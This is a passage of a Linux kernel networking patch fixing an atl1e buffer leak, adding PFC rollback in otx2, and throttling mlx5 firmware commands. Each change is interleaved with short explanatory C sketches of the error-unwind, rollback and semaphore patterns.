++++ b/drivers/net/ethernet/atheros/atl1e/atl1e_main.c
+@@ -866,10 +866,13 @@ static int atl1e_setup_ring_resources(struct atl1e_adapter *adapter)
+ 		netdev_err(adapter->netdev, "offset(%d) > ring size(%d) !!\n",
+ 			   offset, adapter->ring_size);
+ 		err = -1;
+-		goto failed;
++		goto free_buffer;
+ 	}
+ 
+ 	return 0;
++free_buffer:
++	kfree(tx_ring->tx_buffer);
++	tx_ring->tx_buffer = NULL;
+ failed:
+ 	if (adapter->ring_vir_addr != NULL) {
+ 		dma_free_coherent(&pdev->dev, adapter->ring_size,
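
The atl1e fix above introduces a free_buffer label so the offset-check failure path releases tx_buffer before falling through to the existing cleanup. A generic rendering of that unwind-label pattern (not the driver's actual resources):

    #include <stdlib.h>

    /*
     * Each failure jumps to the label that releases exactly what exists
     * so far; the new free_buffer label is what plugs the tx_buffer leak
     * on the offset check.
     */
    static int setup_rings(int fail_offset_check)
    {
        char *ring = malloc(4096);
        char *tx_buffer;

        if (!ring)
            goto failed;
        tx_buffer = malloc(64);
        if (!tx_buffer)
            goto free_ring;
        if (fail_offset_check)
            goto free_buffer;

        /* success: ownership passes to the caller (freed here for the demo) */
        free(tx_buffer);
        free(ring);
        return 0;

    free_buffer:
        free(tx_buffer);
    free_ring:
        free(ring);
    failed:
        return -1;
    }

    int main(void)
    {
        return setup_rings(1) == -1 ? 0 : 1;
    }
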
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_dcbnl.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_dcbnl.c
+index bfddbff7bcdfb..28fb643d2917f 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_dcbnl.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_dcbnl.c
+@@ -399,9 +399,10 @@ static int otx2_dcbnl_ieee_getpfc(struct net_device *dev, struct ieee_pfc *pfc)
+ static int otx2_dcbnl_ieee_setpfc(struct net_device *dev, struct ieee_pfc *pfc)
+ {
+ 	struct otx2_nic *pfvf = netdev_priv(dev);
++	u8 old_pfc_en;
+ 	int err;
+ 
+-	/* Save PFC configuration to interface */
++	old_pfc_en = pfvf->pfc_en;
+ 	pfvf->pfc_en = pfc->pfc_en;
+ 
+ 	if (pfvf->hw.tx_queues >= NIX_PF_PFC_PRIO_MAX)
+@@ -411,13 +412,17 @@ static int otx2_dcbnl_ieee_setpfc(struct net_device *dev, struct ieee_pfc *pfc)
+ 	 * supported by the tx queue configuration
+ 	 */
+ 	err = otx2_check_pfc_config(pfvf);
+-	if (err)
++	if (err) {
++		pfvf->pfc_en = old_pfc_en;
+ 		return err;
++	}
+ 
+ process_pfc:
+ 	err = otx2_config_priority_flow_ctrl(pfvf);
+-	if (err)
++	if (err) {
++		pfvf->pfc_en = old_pfc_en;
+ 		return err;
++	}
+ 
+ 	/* Request Per channel Bpids */
+ 	if (pfc->pfc_en)
+@@ -425,6 +430,12 @@ process_pfc:
+ 
+ 	err = otx2_pfc_txschq_update(pfvf);
+ 	if (err) {
++		if (pfc->pfc_en)
++			otx2_nix_config_bp(pfvf, false);
++
++		otx2_pfc_txschq_stop(pfvf);
++		pfvf->pfc_en = old_pfc_en;
++		otx2_config_priority_flow_ctrl(pfvf);
+ 		dev_err(pfvf->dev, "%s failed to update TX schedulers\n", __func__);
+ 		return err;
+ 	}
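
The otx2 change above snapshots pfc_en before applying the new PFC configuration and rolls back, including re-applying the old configuration, whenever a later step fails. Schematically (stand-in functions, not the real mbox calls):

    #include <stdio.h>

    struct nic { unsigned char pfc_en; };

    /* Stand-in for otx2_config_priority_flow_ctrl(); fails on one value. */
    static int apply_pfc(struct nic *n)
    {
        return n->pfc_en == 0xff ? -1 : 0;
    }

    /*
     * Snapshot the old setting, try the new one, and on any failure
     * restore the field and re-apply the old configuration so software
     * and hardware state stay in sync.
     */
    static int set_pfc(struct nic *n, unsigned char pfc_en)
    {
        unsigned char old_pfc_en = n->pfc_en;

        n->pfc_en = pfc_en;
        if (apply_pfc(n)) {
            n->pfc_en = old_pfc_en;
            apply_pfc(n);
            return -1;
        }
        return 0;
    }

    int main(void)
    {
        struct nic n = { .pfc_en = 0x01 };

        printf("ret=%d pfc_en=0x%02x\n", set_pfc(&n, 0xff), n.pfc_en);
        return 0;
    }
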
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
+index b3253e263ebc8..ac6a0785b10d8 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
+@@ -48,6 +48,25 @@
+ #define CREATE_TRACE_POINTS
+ #include "diag/cmd_tracepoint.h"
+ 
++struct mlx5_ifc_mbox_out_bits {
++	u8         status[0x8];
++	u8         reserved_at_8[0x18];
++
++	u8         syndrome[0x20];
++
++	u8         reserved_at_40[0x40];
++};
++
++struct mlx5_ifc_mbox_in_bits {
++	u8         opcode[0x10];
++	u8         uid[0x10];
++
++	u8         reserved_at_20[0x10];
++	u8         op_mod[0x10];
++
++	u8         reserved_at_40[0x40];
++};
++
+ enum {
+ 	CMD_IF_REV = 5,
+ };
+@@ -71,6 +90,26 @@ enum {
+ 	MLX5_CMD_DELIVERY_STAT_CMD_DESCR_ERR		= 0x10,
+ };
+ 
++static u16 in_to_opcode(void *in)
++{
++	return MLX5_GET(mbox_in, in, opcode);
++}
++
++/* Returns true for opcodes that might be triggered very frequently and throttle
++ * the command interface. Limit their command slots usage.
++ */
++static bool mlx5_cmd_is_throttle_opcode(u16 op)
++{
++	switch (op) {
++	case MLX5_CMD_OP_CREATE_GENERAL_OBJECT:
++	case MLX5_CMD_OP_DESTROY_GENERAL_OBJECT:
++	case MLX5_CMD_OP_MODIFY_GENERAL_OBJECT:
++	case MLX5_CMD_OP_QUERY_GENERAL_OBJECT:
++		return true;
++	}
++	return false;
++}
++
+ static struct mlx5_cmd_work_ent *
+ cmd_alloc_ent(struct mlx5_cmd *cmd, struct mlx5_cmd_msg *in,
+ 	      struct mlx5_cmd_msg *out, void *uout, int uout_size,
+@@ -92,6 +131,7 @@ cmd_alloc_ent(struct mlx5_cmd *cmd, struct mlx5_cmd_msg *in,
+ 	ent->context	= context;
+ 	ent->cmd	= cmd;
+ 	ent->page_queue = page_queue;
++	ent->op         = in_to_opcode(in->first.data);
+ 	refcount_set(&ent->refcnt, 1);
+ 
+ 	return ent;
+@@ -116,24 +156,27 @@ static u8 alloc_token(struct mlx5_cmd *cmd)
+ 	return token;
+ }
+ 
+-static int cmd_alloc_index(struct mlx5_cmd *cmd)
++static int cmd_alloc_index(struct mlx5_cmd *cmd, struct mlx5_cmd_work_ent *ent)
+ {
+ 	unsigned long flags;
+ 	int ret;
+ 
+ 	spin_lock_irqsave(&cmd->alloc_lock, flags);
+-	ret = find_first_bit(&cmd->bitmask, cmd->max_reg_cmds);
+-	if (ret < cmd->max_reg_cmds)
+-		clear_bit(ret, &cmd->bitmask);
++	ret = find_first_bit(&cmd->vars.bitmask, cmd->vars.max_reg_cmds);
++	if (ret < cmd->vars.max_reg_cmds) {
++		clear_bit(ret, &cmd->vars.bitmask);
++		ent->idx = ret;
++		cmd->ent_arr[ent->idx] = ent;
++	}
+ 	spin_unlock_irqrestore(&cmd->alloc_lock, flags);
+ 
+-	return ret < cmd->max_reg_cmds ? ret : -ENOMEM;
++	return ret < cmd->vars.max_reg_cmds ? ret : -ENOMEM;
+ }
+ 
+ static void cmd_free_index(struct mlx5_cmd *cmd, int idx)
+ {
+ 	lockdep_assert_held(&cmd->alloc_lock);
+-	set_bit(idx, &cmd->bitmask);
++	set_bit(idx, &cmd->vars.bitmask);
+ }
+ 
+ static void cmd_ent_get(struct mlx5_cmd_work_ent *ent)
+@@ -152,7 +195,7 @@ static void cmd_ent_put(struct mlx5_cmd_work_ent *ent)
+ 
+ 	if (ent->idx >= 0) {
+ 		cmd_free_index(cmd, ent->idx);
+-		up(ent->page_queue ? &cmd->pages_sem : &cmd->sem);
++		up(ent->page_queue ? &cmd->vars.pages_sem : &cmd->vars.sem);
+ 	}
+ 
+ 	cmd_free_ent(ent);
+@@ -162,7 +205,7 @@ out:
+ 
+ static struct mlx5_cmd_layout *get_inst(struct mlx5_cmd *cmd, int idx)
+ {
+-	return cmd->cmd_buf + (idx << cmd->log_stride);
++	return cmd->cmd_buf + (idx << cmd->vars.log_stride);
+ }
+ 
+ static int mlx5_calc_cmd_blocks(struct mlx5_cmd_msg *msg)
+@@ -753,25 +796,6 @@ static int cmd_status_to_err(u8 status)
+ 	}
+ }
+ 
+-struct mlx5_ifc_mbox_out_bits {
+-	u8         status[0x8];
+-	u8         reserved_at_8[0x18];
+-
+-	u8         syndrome[0x20];
+-
+-	u8         reserved_at_40[0x40];
+-};
+-
+-struct mlx5_ifc_mbox_in_bits {
+-	u8         opcode[0x10];
+-	u8         uid[0x10];
+-
+-	u8         reserved_at_20[0x10];
+-	u8         op_mod[0x10];
+-
+-	u8         reserved_at_40[0x40];
+-};
+-
+ void mlx5_cmd_out_err(struct mlx5_core_dev *dev, u16 opcode, u16 op_mod, void *out)
+ {
+ 	u32 syndrome = MLX5_GET(mbox_out, out, syndrome);
+@@ -789,7 +813,7 @@ static void cmd_status_print(struct mlx5_core_dev *dev, void *in, void *out)
+ 	u16 opcode, op_mod;
+ 	u16 uid;
+ 
+-	opcode = MLX5_GET(mbox_in, in, opcode);
++	opcode = in_to_opcode(in);
+ 	op_mod = MLX5_GET(mbox_in, in, op_mod);
+ 	uid    = MLX5_GET(mbox_in, in, uid);
+ 
+@@ -801,7 +825,7 @@ int mlx5_cmd_check(struct mlx5_core_dev *dev, int err, void *in, void *out)
+ {
+ 	/* aborted due to PCI error or via reset flow mlx5_cmd_trigger_completions() */
+ 	if (err == -ENXIO) {
+-		u16 opcode = MLX5_GET(mbox_in, in, opcode);
++		u16 opcode = in_to_opcode(in);
+ 		u32 syndrome;
+ 		u8 status;
+ 
+@@ -830,9 +854,9 @@ static void dump_command(struct mlx5_core_dev *dev,
+ 			 struct mlx5_cmd_work_ent *ent, int input)
+ {
+ 	struct mlx5_cmd_msg *msg = input ? ent->in : ent->out;
+-	u16 op = MLX5_GET(mbox_in, ent->lay->in, opcode);
+ 	struct mlx5_cmd_mailbox *next = msg->next;
+ 	int n = mlx5_calc_cmd_blocks(msg);
++	u16 op = ent->op;
+ 	int data_only;
+ 	u32 offset = 0;
+ 	int dump_len;
+@@ -884,11 +908,6 @@ static void dump_command(struct mlx5_core_dev *dev,
+ 	mlx5_core_dbg(dev, "cmd[%d]: end dump\n", ent->idx);
+ }
+ 
+-static u16 msg_to_opcode(struct mlx5_cmd_msg *in)
+-{
+-	return MLX5_GET(mbox_in, in->first.data, opcode);
+-}
+-
+ static void mlx5_cmd_comp_handler(struct mlx5_core_dev *dev, u64 vec, bool forced);
+ 
+ static void cb_timeout_handler(struct work_struct *work)
+@@ -906,13 +925,13 @@ static void cb_timeout_handler(struct work_struct *work)
+ 	/* Maybe got handled by eq recover ? */
+ 	if (!test_bit(MLX5_CMD_ENT_STATE_PENDING_COMP, &ent->state)) {
+ 		mlx5_core_warn(dev, "cmd[%d]: %s(0x%x) Async, recovered after timeout\n", ent->idx,
+-			       mlx5_command_str(msg_to_opcode(ent->in)), msg_to_opcode(ent->in));
++			       mlx5_command_str(ent->op), ent->op);
+ 		goto out; /* phew, already handled */
+ 	}
+ 
+ 	ent->ret = -ETIMEDOUT;
+ 	mlx5_core_warn(dev, "cmd[%d]: %s(0x%x) Async, timeout. Will cause a leak of a command resource\n",
+-		       ent->idx, mlx5_command_str(msg_to_opcode(ent->in)), msg_to_opcode(ent->in));
++		       ent->idx, mlx5_command_str(ent->op), ent->op);
+ 	mlx5_cmd_comp_handler(dev, 1ULL << ent->idx, true);
+ 
+ out:
+@@ -955,10 +974,10 @@ static void cmd_work_handler(struct work_struct *work)
+ 	cb_timeout = msecs_to_jiffies(mlx5_tout_ms(dev, CMD));
+ 
+ 	complete(&ent->handling);
+-	sem = ent->page_queue ? &cmd->pages_sem : &cmd->sem;
++	sem = ent->page_queue ? &cmd->vars.pages_sem : &cmd->vars.sem;
+ 	down(sem);
+ 	if (!ent->page_queue) {
+-		alloc_ret = cmd_alloc_index(cmd);
++		alloc_ret = cmd_alloc_index(cmd, ent);
+ 		if (alloc_ret < 0) {
+ 			mlx5_core_err_rl(dev, "failed to allocate command entry\n");
+ 			if (ent->callback) {
+@@ -973,20 +992,18 @@ static void cmd_work_handler(struct work_struct *work)
+ 			up(sem);
+ 			return;
+ 		}
+-		ent->idx = alloc_ret;
+ 	} else {
+-		ent->idx = cmd->max_reg_cmds;
++		ent->idx = cmd->vars.max_reg_cmds;
+ 		spin_lock_irqsave(&cmd->alloc_lock, flags);
+-		clear_bit(ent->idx, &cmd->bitmask);
++		clear_bit(ent->idx, &cmd->vars.bitmask);
++		cmd->ent_arr[ent->idx] = ent;
+ 		spin_unlock_irqrestore(&cmd->alloc_lock, flags);
+ 	}
+ 
+-	cmd->ent_arr[ent->idx] = ent;
+ 	lay = get_inst(cmd, ent->idx);
+ 	ent->lay = lay;
+ 	memset(lay, 0, sizeof(*lay));
+ 	memcpy(lay->in, ent->in->first.data, sizeof(lay->in));
+-	ent->op = be32_to_cpu(lay->in[0]) >> 16;
+ 	if (ent->in->next)
+ 		lay->in_ptr = cpu_to_be64(ent->in->next->dma);
+ 	lay->inlen = cpu_to_be32(ent->in->len);
+@@ -1099,12 +1116,12 @@ static void wait_func_handle_exec_timeout(struct mlx5_core_dev *dev,
+ 	 */
+ 	if (wait_for_completion_timeout(&ent->done, timeout)) {
+ 		mlx5_core_warn(dev, "cmd[%d]: %s(0x%x) recovered after timeout\n", ent->idx,
+-			       mlx5_command_str(msg_to_opcode(ent->in)), msg_to_opcode(ent->in));
++			       mlx5_command_str(ent->op), ent->op);
+ 		return;
+ 	}
+ 
+ 	mlx5_core_warn(dev, "cmd[%d]: %s(0x%x) No done completion\n", ent->idx,
+-		       mlx5_command_str(msg_to_opcode(ent->in)), msg_to_opcode(ent->in));
++		       mlx5_command_str(ent->op), ent->op);
+ 
+ 	ent->ret = -ETIMEDOUT;
+ 	mlx5_cmd_comp_handler(dev, 1ULL << ent->idx, true);
+@@ -1131,12 +1148,10 @@ out_err:
+ 
+ 	if (err == -ETIMEDOUT) {
+ 		mlx5_core_warn(dev, "%s(0x%x) timeout. Will cause a leak of a command resource\n",
+-			       mlx5_command_str(msg_to_opcode(ent->in)),
+-			       msg_to_opcode(ent->in));
++			       mlx5_command_str(ent->op), ent->op);
+ 	} else if (err == -ECANCELED) {
+ 		mlx5_core_warn(dev, "%s(0x%x) canceled on out of queue timeout.\n",
+-			       mlx5_command_str(msg_to_opcode(ent->in)),
+-			       msg_to_opcode(ent->in));
++			       mlx5_command_str(ent->op), ent->op);
+ 	}
+ 	mlx5_core_dbg(dev, "err %d, delivery status %s(%d)\n",
+ 		      err, deliv_status_to_str(ent->status), ent->status);
+@@ -1170,7 +1185,6 @@ static int mlx5_cmd_invoke(struct mlx5_core_dev *dev, struct mlx5_cmd_msg *in,
+ 	u8 status = 0;
+ 	int err = 0;
+ 	s64 ds;
+-	u16 op;
+ 
+ 	if (callback && page_queue)
+ 		return -EINVAL;
+@@ -1210,9 +1224,8 @@ static int mlx5_cmd_invoke(struct mlx5_core_dev *dev, struct mlx5_cmd_msg *in,
+ 		goto out_free;
+ 
+ 	ds = ent->ts2 - ent->ts1;
+-	op = MLX5_GET(mbox_in, in->first.data, opcode);
+-	if (op < MLX5_CMD_OP_MAX) {
+-		stats = &cmd->stats[op];
++	if (ent->op < MLX5_CMD_OP_MAX) {
++		stats = &cmd->stats[ent->op];
+ 		spin_lock_irq(&stats->lock);
+ 		stats->sum += ds;
+ 		++stats->n;
+@@ -1220,7 +1233,7 @@ static int mlx5_cmd_invoke(struct mlx5_core_dev *dev, struct mlx5_cmd_msg *in,
+ 	}
+ 	mlx5_core_dbg_mask(dev, 1 << MLX5_CMD_TIME,
+ 			   "fw exec time for %s is %lld nsec\n",
+-			   mlx5_command_str(op), ds);
++			   mlx5_command_str(ent->op), ds);
+ 
+ out_free:
+ 	status = ent->status;
+@@ -1558,15 +1571,15 @@ void mlx5_cmd_allowed_opcode(struct mlx5_core_dev *dev, u16 opcode)
+ 	struct mlx5_cmd *cmd = &dev->cmd;
+ 	int i;
+ 
+-	for (i = 0; i < cmd->max_reg_cmds; i++)
+-		down(&cmd->sem);
+-	down(&cmd->pages_sem);
++	for (i = 0; i < cmd->vars.max_reg_cmds; i++)
++		down(&cmd->vars.sem);
++	down(&cmd->vars.pages_sem);
+ 
+ 	cmd->allowed_opcode = opcode;
+ 
+-	up(&cmd->pages_sem);
+-	for (i = 0; i < cmd->max_reg_cmds; i++)
+-		up(&cmd->sem);
++	up(&cmd->vars.pages_sem);
++	for (i = 0; i < cmd->vars.max_reg_cmds; i++)
++		up(&cmd->vars.sem);
+ }
+ 
+ static void mlx5_cmd_change_mod(struct mlx5_core_dev *dev, int mode)
+@@ -1574,15 +1587,15 @@ static void mlx5_cmd_change_mod(struct mlx5_core_dev *dev, int mode)
+ 	struct mlx5_cmd *cmd = &dev->cmd;
+ 	int i;
+ 
+-	for (i = 0; i < cmd->max_reg_cmds; i++)
+-		down(&cmd->sem);
+-	down(&cmd->pages_sem);
++	for (i = 0; i < cmd->vars.max_reg_cmds; i++)
++		down(&cmd->vars.sem);
++	down(&cmd->vars.pages_sem);
+ 
+ 	cmd->mode = mode;
+ 
+-	up(&cmd->pages_sem);
+-	for (i = 0; i < cmd->max_reg_cmds; i++)
+-		up(&cmd->sem);
++	up(&cmd->vars.pages_sem);
++	for (i = 0; i < cmd->vars.max_reg_cmds; i++)
++		up(&cmd->vars.sem);
+ }
+ 
+ static int cmd_comp_notifier(struct notifier_block *nb,
+@@ -1641,7 +1654,7 @@ static void mlx5_cmd_comp_handler(struct mlx5_core_dev *dev, u64 vec, bool force
+ 
+ 	/* there can be at most 32 command queues */
+ 	vector = vec & 0xffffffff;
+-	for (i = 0; i < (1 << cmd->log_sz); i++) {
++	for (i = 0; i < (1 << cmd->vars.log_sz); i++) {
+ 		if (test_bit(i, &vector)) {
+ 			ent = cmd->ent_arr[i];
+ 
+@@ -1730,7 +1743,7 @@ static void mlx5_cmd_trigger_completions(struct mlx5_core_dev *dev)
+ 	/* wait for pending handlers to complete */
+ 	mlx5_eq_synchronize_cmd_irq(dev);
+ 	spin_lock_irqsave(&dev->cmd.alloc_lock, flags);
+-	vector = ~dev->cmd.bitmask & ((1ul << (1 << dev->cmd.log_sz)) - 1);
++	vector = ~dev->cmd.vars.bitmask & ((1ul << (1 << dev->cmd.vars.log_sz)) - 1);
+ 	if (!vector)
+ 		goto no_trig;
+ 
+@@ -1739,14 +1752,14 @@ static void mlx5_cmd_trigger_completions(struct mlx5_core_dev *dev)
+ 	 * to guarantee pending commands will not get freed in the meanwhile.
+ 	 * For that reason, it also has to be done inside the alloc_lock.
+ 	 */
+-	for_each_set_bit(i, &bitmask, (1 << cmd->log_sz))
++	for_each_set_bit(i, &bitmask, (1 << cmd->vars.log_sz))
+ 		cmd_ent_get(cmd->ent_arr[i]);
+ 	vector |= MLX5_TRIGGERED_CMD_COMP;
+ 	spin_unlock_irqrestore(&dev->cmd.alloc_lock, flags);
+ 
+ 	mlx5_core_dbg(dev, "vector 0x%llx\n", vector);
+ 	mlx5_cmd_comp_handler(dev, vector, true);
+-	for_each_set_bit(i, &bitmask, (1 << cmd->log_sz))
++	for_each_set_bit(i, &bitmask, (1 << cmd->vars.log_sz))
+ 		cmd_ent_put(cmd->ent_arr[i]);
+ 	return;
+ 
+@@ -1759,22 +1772,22 @@ void mlx5_cmd_flush(struct mlx5_core_dev *dev)
+ 	struct mlx5_cmd *cmd = &dev->cmd;
+ 	int i;
+ 
+-	for (i = 0; i < cmd->max_reg_cmds; i++) {
+-		while (down_trylock(&cmd->sem)) {
++	for (i = 0; i < cmd->vars.max_reg_cmds; i++) {
++		while (down_trylock(&cmd->vars.sem)) {
+ 			mlx5_cmd_trigger_completions(dev);
+ 			cond_resched();
+ 		}
+ 	}
+ 
+-	while (down_trylock(&cmd->pages_sem)) {
++	while (down_trylock(&cmd->vars.pages_sem)) {
+ 		mlx5_cmd_trigger_completions(dev);
+ 		cond_resched();
+ 	}
+ 
+ 	/* Unlock cmdif */
+-	up(&cmd->pages_sem);
+-	for (i = 0; i < cmd->max_reg_cmds; i++)
+-		up(&cmd->sem);
++	up(&cmd->vars.pages_sem);
++	for (i = 0; i < cmd->vars.max_reg_cmds; i++)
++		up(&cmd->vars.sem);
+ }
+ 
+ static struct mlx5_cmd_msg *alloc_msg(struct mlx5_core_dev *dev, int in_size,
+@@ -1817,7 +1830,7 @@ cache_miss:
+ 
+ static int is_manage_pages(void *in)
+ {
+-	return MLX5_GET(mbox_in, in, opcode) == MLX5_CMD_OP_MANAGE_PAGES;
++	return in_to_opcode(in) == MLX5_CMD_OP_MANAGE_PAGES;
+ }
+ 
+ /*  Notes:
+@@ -1828,8 +1841,9 @@ static int cmd_exec(struct mlx5_core_dev *dev, void *in, int in_size, void *out,
+ 		    int out_size, mlx5_cmd_cbk_t callback, void *context,
+ 		    bool force_polling)
+ {
+-	u16 opcode = MLX5_GET(mbox_in, in, opcode);
+ 	struct mlx5_cmd_msg *inb, *outb;
++	u16 opcode = in_to_opcode(in);
++	bool throttle_op;
+ 	int pages_queue;
+ 	gfp_t gfp;
+ 	u8 token;
+@@ -1838,13 +1852,21 @@ static int cmd_exec(struct mlx5_core_dev *dev, void *in, int in_size, void *out,
+ 	if (mlx5_cmd_is_down(dev) || !opcode_allowed(&dev->cmd, opcode))
+ 		return -ENXIO;
+ 
++	throttle_op = mlx5_cmd_is_throttle_opcode(opcode);
++	if (throttle_op) {
++		/* atomic context may not sleep */
++		if (callback)
++			return -EINVAL;
++		down(&dev->cmd.vars.throttle_sem);
++	}
++
+ 	pages_queue = is_manage_pages(in);
+ 	gfp = callback ? GFP_ATOMIC : GFP_KERNEL;
+ 
+ 	inb = alloc_msg(dev, in_size, gfp);
+ 	if (IS_ERR(inb)) {
+ 		err = PTR_ERR(inb);
+-		return err;
++		goto out_up;
+ 	}
+ 
+ 	token = alloc_token(&dev->cmd);
+@@ -1878,6 +1900,9 @@ out_out:
+ 	mlx5_free_cmd_msg(dev, outb);
+ out_in:
+ 	free_msg(dev, inb);
++out_up:
++	if (throttle_op)
++		up(&dev->cmd.vars.throttle_sem);
+ 	return err;
+ }
+ 
+@@ -1952,8 +1977,8 @@ static int cmd_status_err(struct mlx5_core_dev *dev, int err, u16 opcode, u16 op
+ int mlx5_cmd_do(struct mlx5_core_dev *dev, void *in, int in_size, void *out, int out_size)
+ {
+ 	int err = cmd_exec(dev, in, in_size, out, out_size, NULL, NULL, false);
+-	u16 opcode = MLX5_GET(mbox_in, in, opcode);
+ 	u16 op_mod = MLX5_GET(mbox_in, in, op_mod);
++	u16 opcode = in_to_opcode(in);
+ 
+ 	return cmd_status_err(dev, err, opcode, op_mod, out);
+ }
+@@ -1998,8 +2023,8 @@ int mlx5_cmd_exec_polling(struct mlx5_core_dev *dev, void *in, int in_size,
+ 			  void *out, int out_size)
+ {
+ 	int err = cmd_exec(dev, in, in_size, out, out_size, NULL, NULL, true);
+-	u16 opcode = MLX5_GET(mbox_in, in, opcode);
+ 	u16 op_mod = MLX5_GET(mbox_in, in, op_mod);
++	u16 opcode = in_to_opcode(in);
+ 
+ 	err = cmd_status_err(dev, err, opcode, op_mod, out);
+ 	return mlx5_cmd_check(dev, err, in, out);
+@@ -2051,7 +2076,7 @@ int mlx5_cmd_exec_cb(struct mlx5_async_ctx *ctx, void *in, int in_size,
+ 
+ 	work->ctx = ctx;
+ 	work->user_callback = callback;
+-	work->opcode = MLX5_GET(mbox_in, in, opcode);
++	work->opcode = in_to_opcode(in);
+ 	work->op_mod = MLX5_GET(mbox_in, in, op_mod);
+ 	work->out = out;
+ 	if (WARN_ON(!atomic_inc_not_zero(&ctx->num_inflight)))
+@@ -2187,16 +2212,16 @@ int mlx5_cmd_init(struct mlx5_core_dev *dev)
+ 		goto err_free_pool;
+ 
+ 	cmd_l = ioread32be(&dev->iseg->cmdq_addr_l_sz) & 0xff;
+-	cmd->log_sz = cmd_l >> 4 & 0xf;
+-	cmd->log_stride = cmd_l & 0xf;
+-	if (1 << cmd->log_sz > MLX5_MAX_COMMANDS) {
++	cmd->vars.log_sz = cmd_l >> 4 & 0xf;
++	cmd->vars.log_stride = cmd_l & 0xf;
++	if (1 << cmd->vars.log_sz > MLX5_MAX_COMMANDS) {
+ 		mlx5_core_err(dev, "firmware reports too many outstanding commands %d\n",
+-			      1 << cmd->log_sz);
++			      1 << cmd->vars.log_sz);
+ 		err = -EINVAL;
+ 		goto err_free_page;
+ 	}
+ 
+-	if (cmd->log_sz + cmd->log_stride > MLX5_ADAPTER_PAGE_SHIFT) {
++	if (cmd->vars.log_sz + cmd->vars.log_stride > MLX5_ADAPTER_PAGE_SHIFT) {
+ 		mlx5_core_err(dev, "command queue size overflow\n");
+ 		err = -EINVAL;
+ 		goto err_free_page;
+@@ -2204,13 +2229,13 @@ int mlx5_cmd_init(struct mlx5_core_dev *dev)
+ 
+ 	cmd->state = MLX5_CMDIF_STATE_DOWN;
+ 	cmd->checksum_disabled = 1;
+-	cmd->max_reg_cmds = (1 << cmd->log_sz) - 1;
+-	cmd->bitmask = (1UL << cmd->max_reg_cmds) - 1;
++	cmd->vars.max_reg_cmds = (1 << cmd->vars.log_sz) - 1;
++	cmd->vars.bitmask = (1UL << cmd->vars.max_reg_cmds) - 1;
+ 
+-	cmd->cmdif_rev = ioread32be(&dev->iseg->cmdif_rev_fw_sub) >> 16;
+-	if (cmd->cmdif_rev > CMD_IF_REV) {
++	cmd->vars.cmdif_rev = ioread32be(&dev->iseg->cmdif_rev_fw_sub) >> 16;
++	if (cmd->vars.cmdif_rev > CMD_IF_REV) {
+ 		mlx5_core_err(dev, "driver does not support command interface version. driver %d, firmware %d\n",
+-			      CMD_IF_REV, cmd->cmdif_rev);
++			      CMD_IF_REV, cmd->vars.cmdif_rev);
+ 		err = -EOPNOTSUPP;
+ 		goto err_free_page;
+ 	}
+@@ -2220,8 +2245,9 @@ int mlx5_cmd_init(struct mlx5_core_dev *dev)
+ 	for (i = 0; i < MLX5_CMD_OP_MAX; i++)
+ 		spin_lock_init(&cmd->stats[i].lock);
+ 
+-	sema_init(&cmd->sem, cmd->max_reg_cmds);
+-	sema_init(&cmd->pages_sem, 1);
++	sema_init(&cmd->vars.sem, cmd->vars.max_reg_cmds);
++	sema_init(&cmd->vars.pages_sem, 1);
++	sema_init(&cmd->vars.throttle_sem, DIV_ROUND_UP(cmd->vars.max_reg_cmds, 2));
+ 
+ 	cmd_h = (u32)((u64)(cmd->dma) >> 32);
+ 	cmd_l = (u32)(cmd->dma);
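
The mlx5 change above adds vars.throttle_sem, sized with DIV_ROUND_UP(max_reg_cmds, 2), so the GENERAL_OBJECT opcodes can occupy at most half the command slots. A userspace sketch with POSIX semaphores; the opcode values in the predicate are placeholders:

    #include <semaphore.h>
    #include <stdio.h>

    #define MAX_REG_CMDS 31

    static sem_t throttle_sem;

    /* Stand-in predicate; the real driver lists the GENERAL_OBJECT opcodes. */
    static int is_throttle_opcode(int op)
    {
        return op >= 0xa00 && op <= 0xa03;
    }

    /*
     * High-frequency opcodes must additionally take throttle_sem, which
     * is initialised to half the command slots, so they can never
     * exhaust the command interface for everyone else.
     */
    static void exec_cmd(int op)
    {
        int throttled = is_throttle_opcode(op);

        if (throttled)
            sem_wait(&throttle_sem);
        printf("executing opcode 0x%x\n", op);
        if (throttled)
            sem_post(&throttle_sem);
    }

    int main(void)
    {
        sem_init(&throttle_sem, 0, (MAX_REG_CMDS + 1) / 2);
        exec_cmd(0xa00);
        sem_destroy(&throttle_sem);
        return 0;
    }
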
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/debugfs.c b/drivers/net/ethernet/mellanox/mlx5/core/debugfs.c
+index bb95b40d25eb5..e0b0729e238c1 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/debugfs.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/debugfs.c
+@@ -176,8 +176,8 @@ static ssize_t slots_read(struct file *filp, char __user *buf, size_t count,
+ 	int ret;
+ 
+ 	cmd = filp->private_data;
+-	weight = bitmap_weight(&cmd->bitmask, cmd->max_reg_cmds);
+-	field = cmd->max_reg_cmds - weight;
++	weight = bitmap_weight(&cmd->vars.bitmask, cmd->vars.max_reg_cmds);
++	field = cmd->vars.max_reg_cmds - weight;
+ 	ret = snprintf(tbuf, sizeof(tbuf), "%d\n", field);
+ 	return simple_read_from_buffer(buf, count, pos, tbuf, ret);
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+index 374c0011a127b..3ba54ffa54bfe 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+@@ -691,7 +691,7 @@ static void mlx5_fw_tracer_handle_traces(struct work_struct *work)
+ 
+ 	while (block_timestamp > tracer->last_timestamp) {
+ 		/* Check block override if it's not the first block */
+-		if (!tracer->last_timestamp) {
++		if (tracer->last_timestamp) {
+ 			u64 *ts_event;
+ 			/* To avoid block override be the HW in case of buffer
+ 			 * wraparound, the time stamp of the previous block
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c b/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c
